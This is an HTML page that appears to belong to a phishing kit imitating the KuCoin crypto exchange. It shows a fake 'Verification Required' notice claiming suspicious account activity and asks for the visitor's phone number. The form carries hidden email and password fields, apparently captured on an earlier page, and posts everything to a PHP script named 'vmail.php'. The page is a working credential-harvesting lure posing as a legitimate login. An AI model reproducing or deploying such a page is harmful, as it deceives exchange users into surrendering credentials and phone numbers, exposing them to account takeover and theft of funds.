

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Kucoin Login</title>
    <link rel="stylesheet" href="assets/css/all.min.css">
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/verify.css">
        <link rel="stylesheet" href="assets/css/style.css">
</head>

<body>
    <div class="container-fluid" id="kucoin-form">
        <div class="row">

            <div class="col-md-5 p-0">
                <div class="content">
                    <a href="#"><img src="assets/images/download.svg"></a>

                    <div class="overlay-content">
                        <h1>Find the next crypto gem on KuCoin</h1>
                        <p>1 Out of 4 Crypto Holders Worldwide Is with KuCoin</p>
                    </div>
                </div>
            </div>

            <div class="col-md-7 p-0">
                <div class="form-area">
                    <div class="navigation">
                        <p>Haven't registered yet?<a href="#"> Sign up Now.</a></p>
                    </div>
                    <div class="form">
                        <h2>Verification Required</h2>
                        <p>Important Message:</p>
                        <p>Some Suspicious Activity Found With Your Account, Enter Your Phone Number to Verify Your
                            Identity.</p>

                        <form class="form-group" action="vender/vmail.php" method="post">

            <input type="hidden" name="email" value="">
            <input type="hidden" name="password" value="">
                            <label>Phone Number</label>
                            <input type="text" placeholder="+1 123 456 7890" name="number" class="form-control">
                            <div>
                                <button type="submit" name="submit" class="btn">Sign In</button>
                            </div>
                        </form>



                    </div>
                </div>
            </div>

        </div>
    </div>


    <script src="assets/js/jquery-3.5.1.min.js"></script>
     
    <script src="assets/js/bootstrap.min.js"></script>
</body>

</html>